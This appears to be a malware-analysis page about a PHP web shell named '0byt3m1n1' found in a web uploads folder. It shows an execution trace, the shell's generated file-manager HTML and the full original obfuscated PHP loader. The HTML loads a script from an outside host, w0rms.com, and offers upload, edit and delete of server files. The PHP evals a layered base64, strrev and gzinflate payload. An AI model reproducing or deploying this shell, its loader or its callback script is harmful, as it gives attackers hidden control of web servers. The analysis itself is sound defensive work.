3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	15	$id = 3
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	15	$id = 4
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	16	$i++
4	22	0	0.002454	462936	scandir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	51	1	'/var/www/html/uploads'
4	22	1	0.002493	463552
4	22	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '0.php', 4 => 'data', 5 => 'prepend.php']
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	51	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '0.php', 4 => 'data', 5 => 'prepend.php']
4	23	0	0.002533	463568	is_dir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/.'
4	23	1	0.002551	463632
4	23	R			TRUE
4	24	0	0.002565	463600	is_dir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/..'
4	24	1	0.002581	463648
4	24	R			TRUE
4	25	0	0.002595	463608	is_dir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/.htaccess'
4	25	1	0.002611	463648
4	25	R			FALSE
4	26	0	0.002625	463608	is_dir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/0.php'
4	26	1	0.002641	463648
4	26	R			FALSE
4	27	0	0.002654	463608	is_dir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/data'
4	27	1	0.002670	463648
4	27	R			TRUE
4	28	0	0.002683	463608	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	58	1	'/var/www/html/uploads/data'
4	28	1	0.002703	463648
4	28	R			TRUE
4	29	0	0.002717	463608	perms	1		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	60	1	'/var/www/html/uploads/data'
5	30	0	0.002731	463608	fileperms	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/data'
5	30	1	0.002745	463648
5	30	R			16895
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 16895
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info = 'd'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4	29	1	0.002931	463648
4	29	R			'drwxrwxrwx'
4	31	0	0.002951	463608	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	61	1	'/var/www/html/uploads/data'
4	31	1	0.002977	463648
4	31	R			TRUE
4	32	0	0.002996	463608	filemtime	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	62	1	'/var/www/html/uploads/data'
4	32	1	0.003015	463648
4	32	R			1676255981
4	33	0	0.003033	463552	date	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	62	2	'd-M-Y H:i'	1676255981
4	33	1	0.003110	465944
4	33	R			'12-Feb-2023 21:39'
4	34	0	0.003135	465680	is_dir	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/prepend.php'
4	34	1	0.003159	465728
4	34	R			FALSE
4	35	0	0.003178	465672	is_file	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/.'
4	35	1	0.003198	465696
4	35	R			FALSE
4	36	0	0.003216	465664	is_file	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/..'
4	36	1	0.003237	465712
4	36	R			FALSE
4	37	0	0.003255	465672	is_file	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/.htaccess'
4	37	1	0.003275	465712
4	37	R			TRUE
4	38	0	0.003293	465672	filesize	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/.htaccess'
4	38	1	0.003312	465712
4	38	R			64
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	$size = 0.0625
4	39	0	0.003346	465616	round	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	2	0.0625	3
4	39	1	0.003366	465688
4	39	R			0.063
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	$size = 0.063
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	$size = '0.063 KB'
4	40	0	0.003417	465712	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	67	1	'/var/www/html/uploads/.htaccess'
4	40	1	0.003441	465752
4	40	R			FALSE
4	41	0	0.003458	465712	is_readable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	68	1	'/var/www/html/uploads/.htaccess'
4	41	1	0.003479	465752
4	41	R			TRUE
4	42	0	0.003497	465712	perms	1		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	69	1	'/var/www/html/uploads/.htaccess'
5	43	0	0.003515	465712	fileperms	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/.htaccess'
5	43	1	0.003534	465752
5	43	R			33188
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 33188
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info = '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4	42	1	0.003699	465752
4	42	R			'-rw-r--r--'
4	44	0	0.003717	465712	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/.htaccess'
4	44	1	0.003740	465752
4	44	R			FALSE
4	45	0	0.003757	465712	is_readable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/.htaccess'
4	45	1	0.003784	465752
4	45	R			TRUE
4	46	0	0.003802	465712	filemtime	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	71	1	'/var/www/html/uploads/.htaccess'
4	46	1	0.003821	465752
4	46	R			1676255981
4	47	0	0.003839	465656	date	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	71	2	'd-M-Y H:i'	1676255981
4	47	1	0.003881	465984
4	47	R			'12-Feb-2023 21:39'
4	48	0	0.003902	465712	is_file	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/0.php'
4	48	1	0.003923	465752
4	48	R			TRUE
4	49	0	0.003941	465712	filesize	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/0.php'
4	49	1	0.003958	465752
4	49	R			3639
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	$size = 3.5537109375
4	50	0	0.003992	465616	round	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	2	3.5537109375	3
4	50	1	0.004011	465688
4	50	R			3.554
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	$size = 3.554
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	$size = '3.554 KB'
4	51	0	0.004061	465712	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	67	1	'/var/www/html/uploads/0.php'
4	51	1	0.004083	465752
4	51	R			FALSE
4	52	0	0.004100	465712	is_readable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	68	1	'/var/www/html/uploads/0.php'
4	52	1	0.004122	465752
4	52	R			TRUE
4	53	0	0.004139	465712	perms	1		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	69	1	'/var/www/html/uploads/0.php'
5	54	0	0.004158	465712	fileperms	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/0.php'
5	54	1	0.004176	465752
5	54	R			33204
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 33204
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info = '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4	53	1	0.004341	465752
4	53	R			'-rw-rw-r--'
4	55	0	0.004360	465712	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/0.php'
4	55	1	0.004382	465752
4	55	R			FALSE
4	56	0	0.004400	465712	is_readable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/0.php'
4	56	1	0.004421	465752
4	56	R			TRUE
4	57	0	0.004438	465712	filemtime	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	71	1	'/var/www/html/uploads/0.php'
4	57	1	0.004457	465752
4	57	R			1676255981
4	58	0	0.004474	465656	date	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	71	2	'd-M-Y H:i'	1676255981
4	58	1	0.004515	465984
4	58	R			'12-Feb-2023 21:39'
4	59	0	0.004536	465712	is_file	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/data'
4	59	1	0.004558	465752
4	59	R			FALSE
4	60	0	0.004576	465720	is_file	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/prepend.php'
4	60	1	0.004598	465768
4	60	R			TRUE
4	61	0	0.004615	465728	filesize	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/prepend.php'
4	61	1	0.004634	465768
4	61	R			57
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	64	$size = 0.0556640625
4	62	0	0.004667	465624	round	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	2	0.0556640625	3
4	62	1	0.004686	465696
4	62	R			0.056
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	$size = 0.056
3		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	65	$size = '0.056 KB'
4	63	0	0.004741	465728	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	67	1	'/var/www/html/uploads/prepend.php'
4	63	1	0.004764	465768
4	63	R			FALSE
4	64	0	0.004781	465728	is_readable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	68	1	'/var/www/html/uploads/prepend.php'
4	64	1	0.004803	465768
4	64	R			TRUE
4	65	0	0.004820	465728	perms	1		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	69	1	'/var/www/html/uploads/prepend.php'
5	66	0	0.004839	465728	fileperms	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/prepend.php'
5	66	1	0.004858	465768
5	66	R			33261
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 33261
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info = '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4	65	1	0.005024	465768
4	65	R			'-rwxr-xr-x'
4	67	0	0.005043	465728	is_writable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/prepend.php'
4	67	1	0.005065	465768
4	67	R			FALSE
4	68	0	0.005083	465728	is_readable	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/prepend.php'
4	68	1	0.005105	465768
4	68	R			TRUE
4	69	0	0.005122	465728	filemtime	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	71	1	'/var/www/html/uploads/prepend.php'
4	69	1	0.005142	465768
4	69	R			1676255981
4	70	0	0.005159	465664	date	0		/var/www/html/uploads/0.php(5) : eval()'d code(1) : eval()'d code	71	2	'd-M-Y H:i'	1676255981
4	70	1	0.005200	465992
4	70	R			'12-Feb-2023 21:39'
3	15	1	0.005231	465776
2	7	1	0.005247	424680
1		A						/var/www/html/uploads/0.php	6	$encodephp = ''
2	71	0	0.005271	422224	base64_decode	0		/var/www/html/uploads/0.php	7	1	''
2	71	1	0.005287	422288
2	71	R			''
			0.005329	340680
TRACE END   [2023-02-13 00:40:07.090916]


Generated HTML code

<html><head><script src="http://w0rms.com/kaydet.php"></script><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;">
<input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first">
<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>
<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/0.php&amp;path=/var/www/html">0.php</a></td><td><center>3.554 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 21:39</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="0.php"><input type="hidden" name="path" value="/var/www/html/0.php"><input type="submit" value="+"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 21:39</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value="+"></form></center></td></tr></tbody></table></div><br><center>© 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br></body></html>

Original PHP code

<?php
//w0rms.com shell secure
$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$r57txt = "==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";
eval(htmlspecialchars_decode(urldecode(base64_decode($encoder57txt))));
$encodephp="";
base64_decode($encodephp);
exit;
?>